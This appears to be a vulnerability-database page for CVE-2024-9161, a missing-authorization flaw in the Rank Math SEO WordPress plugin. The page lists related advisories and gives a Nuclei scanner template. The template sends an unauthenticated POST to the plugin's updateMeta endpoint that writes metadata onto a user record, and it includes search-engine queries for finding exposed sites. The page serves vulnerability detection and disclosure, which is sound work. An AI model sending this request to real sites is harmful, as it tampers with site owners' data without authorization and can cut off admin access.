| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2024-9161 | 5 Oct 202414:36 | – | circl | |
| WordPress plugin Rank Math SEO 安全漏洞 | 5 Oct 202400:00 | – | cnnvd | |
| CVE-2024-9161 | 5 Oct 202411:21 | – | cve | |
| CVE-2024-9161 Rank Math SEO – AI SEO Tools to Dominate SEO Rankings <= 1.0.228 - Missing Authorization to Unauthenticated User and Term Metadata Insert, Update, and Delete | 5 Oct 202411:21 | – | cvelist | |
| EUVD-2024-49763 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-9161 | 5 Oct 202412:15 | – | nvd | |
| Rank Math SEO with AI SEO Tools Plugin < 1.0.229 Multiple Vulnerabilities | 25 Nov 202400:00 | – | openvas | |
| WordPress Rank Math SEO Plugin <= 1.0.228 is vulnerable to Broken Access Control | 7 Oct 202400:00 | – | patchstack | |
| WordPress Rank Math SEO plugin <= 1.0.228 - Missing Authorization to Unauthenticated User and Term Metadata Insert, Update, and Delete vulnerability | 7 Oct 202400:37 | – | patchstack | |
| PT-2024-39463 · WordPress · Rank Math Seo | 5 Oct 202400:00 | – | ptsecurity |
id: CVE-2024-9161
info:
name: Rank Math SEO < 1.0.229 - Unauthenticated User and Term Metadata Insert/Update/Deletion
author: Kazgangap
severity: medium
description: |
Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress contains a missing capability check on 'update_metadata' in all versions up to 1.0.228, letting unauthenticated attackers insert, update, or delete metadata, including user and term metadata, potentially causing loss of access to the admin dashboard.
impact: |
Unauthenticated attackers can modify or delete metadata, leading to data loss and potential denial of access to the admin dashboard.
remediation: |
Update to version 1.0.229 or later.
reference:
- https://wpscan.com/vulnerability/95be2559-f0e2-4e98-9bef-3989df0d25bf/
- https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L120
- https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L161
- https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L162
- https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L64
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
cvss-score: 6.5
cve-id: CVE-2024-9161
cwe-id: CWE-862
epss-score: 0.02045
epss-percentile: 0.78813
cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: rankmath
product: seo
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/seo-by-rank-math/"
fofa-query: body="/wp-content/plugins/seo-by-rank-math/"
publicwww-query: "/wp-content/plugins/seo-by-rank-math/"
tags: cve,cve2024,wordpress,seo-by-rank-math,wp-plugin,wpscan,rankmath,intrusive,vkev
variables:
objectid: "{{rand_int(1,9)}}"
data: "meta_{{to_lower(rand_text_alpha(12))}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/seo-by-rank-math/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Rank Math")'
condition: and
internal: true
- raw:
- |
POST /wp-json/rankmath/v1/updateMeta HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"objectType": "user",
"objectID": {{objectid}},
"meta": {
"{{data}}": "{{data}}"
}
}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"slug", "true", "schemas")'
- 'contains(content_type, "application/json")'
- "status_code == 200"
condition: and
# digest: 4a0a004730450220161ba04fccf9e58b9f4da79c1e91d027d1bfa664764925012c93bd67d7c64611022100fb17a8db12d7516017c9bb100eb0cacab37be89ef3233747271a5c312b3da253:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation